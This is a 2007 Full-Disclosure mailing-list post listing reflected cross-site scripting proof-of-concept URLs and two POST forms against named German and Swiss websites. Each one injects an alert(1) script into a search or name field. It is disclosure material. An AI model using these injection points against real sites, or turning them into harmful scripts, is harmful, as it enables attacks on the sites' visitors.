Date: Fri, 30 Mar 2007 15:18:24 +0200
From: "Hanno Böck" <mail@...eck.de>
To: full-disclosure@...ts.grok.org.uk
Subject: A lot of XSS

Blog-Entry:
http://www.hboeck.de/item/468

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>

And some with post:

<form method="post" 
action="http://www.adac.de/Search/SearchResult/RW_SearchResult.asp">
<input type="hidden" name="RWQuery" value='"><script>alert(1)</script>'/>
<input type="submit" value="adac.de"/>
</form>
<form method="post" 
action="http://www.tu-berlin.de/www/software/java/cgi-bin/search.pl">
<input type="hidden" NAME="terms" value='"><script>alert(1)</script>'/>
<input type="submit" value="hoax-info.de"/>
</form>


-- 
Hanno Böck		Blog:   http://www.hboeck.de/
GPG: 3DBD3B20		Jabber: jabber@...eck.de

Content of type "application/pgp-signature" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists